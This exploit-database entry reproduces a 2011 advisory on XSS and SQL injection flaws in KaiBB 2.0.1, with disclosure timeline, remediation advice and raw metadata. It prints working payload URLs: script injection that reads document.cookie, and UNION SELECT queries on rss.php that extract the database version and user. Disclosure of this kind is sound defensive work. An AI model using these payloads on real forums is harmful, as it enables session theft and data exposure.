ID 1337DAY-ID-16987
Type zdt
Reporter Stefan Schurtz
Modified 2011-10-09T00:00:00
Description
Exploit for php platform in category web applications
Author: Stefan Schurtz
Affected Software: Successfully tested on KaiBB 2.0.1
Vendor URL: http://code.google.com/p/kaibb/
Vendor Status: informed
CVE-ID: -
==========================
Vulnerability Description:
==========================
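KaiBB 2.0.1 is prone to cross-site scripting (XSS) and SQL injection vulnerabilities. Judging from the requests below, the raw query string of the index page appears to be reflected into a script block without output encoding, and the `forum` parameter of rss.php appears to be placed into a SQL statement without parameterization.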
==================
Technical Details:
==================
Cross-site Scripting
http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>
SQL Injection
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
=========
Solution:
=========
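- (no vendor fix was listed when this advisory was published). Based on the requests shown above, the likely remediation is to bind the `forum` value in rss.php as a query parameter (or validate it as the expected type) and to apply context-appropriate output encoding wherever the request query string is echoed into the page. Defenders running this version can look for `UNION` / `SELECT` keywords in requests to rss.php and for `<script>` sequences in query strings in their web server logs.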
====================
Disclosure Timeline:
====================
08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
========
Credits:
========
Vulnerability found and advisory written by Stefan Schurtz.
{"id": "1337DAY-ID-16987", "lastseen": "2018-02-17T19:26:33", "viewCount": 5, "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2018-02-17T19:26:33", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-17T19:26:33", "rev": 2}, "vulnersScore": -0.0}, "type": "zdt", "sourceHref": "https://0day.today/exploit/16987", "description": "Exploit for php platform in category web applications", "title": "KaiBB 2.0.1 SQL Injection vulnerability", "cvelist": [], "sourceData": "Author: Stefan Schurtz\r\nAffected Software: Successfully tested on KaiBB 2.0.1\r\nVendor URL: http://code.google.com/p/kaibb/\r\nVendor Status: informed\r\nCVE-ID: -\r\n \r\n==========================\r\nVulnerability Description:\r\n==========================\r\n \r\nKaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities\r\n \r\n==================\r\nTechnical Details:\r\n==================\r\n \r\nCross-site Scripting\r\n \r\nhttp://<target>/kaibb/?'</script><script>alert(document.cookie)</script>\r\nhttp://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>\r\n \r\nSQL Injection\r\n \r\nhttp://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a\r\nhttp://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a\r\nhttp://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a\r\n \r\n=========\r\nSolution:\r\n=========\r\n \r\n-\r\n \r\n====================\r\nDisclosure Timeline:\r\n====================\r\n \r\n08-Oct-2011 - informed developers\r\n08-Oct-2011 - release date of this security advisory\r\n \r\n========\r\nCredits:\r\n========\r\n \r\nVulnerability found and advisory written by Stefan Schurtz.\r\n\r\n\n\n# 0day.today [2018-02-17] #", "published": "2011-10-09T00:00:00", "references": [], "reporter": 
"Stefan Schurtz", "modified": "2011-10-09T00:00:00", "href": "https://0day.today/exploit/description/16987"}
{}